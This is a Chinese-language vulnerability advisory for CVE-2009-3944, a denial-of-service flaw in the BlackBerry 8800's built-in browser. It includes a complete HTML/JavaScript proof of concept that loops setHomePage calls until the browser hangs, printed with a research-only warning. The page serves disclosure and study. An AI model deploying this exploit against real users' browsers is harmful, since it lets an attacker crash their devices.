发布日期：2009-11-16
更新日期：2009-11-17

受影响系统：

RIM BlackBerry 8800

描述：

---

CVE ID: CVE-2009-3944

BlackBerry 8800是一款流行的智能手机。

BlackBerry 8800手机内嵌的浏览器中存在拒绝服务漏洞，远程攻击者可以利用通过使用setHomePage方式和DHTML行为属性配置主页的JavaScript循环导致浏览器挂起。

<*来源：MustLive （mustlive@websecurity.com.ua）
  
  链接：http://marc.info/?l=bugtraq&m=125778617727776&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
<title>Internet Explorer DoS Exploit (C) 2009 MustLive. http://websecurity.com.ua</title>
<script>
function DoS() {
    document.getElementById("dos").click();
    setTimeout(DoS,1);
}
</script>
</head>
<body onload="DoS()">
<div align="center"><a id="dos" href="#" onClick="this.style.behavior='url(#default#homepage)';this.setHomePage('http://websecurity.com.ua')">   !</a></div>
</body>
</html>

建议：

---

厂商补丁：

RIM
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.blackberry.com/

浏览次数：2118
严重程度：0（网友投票）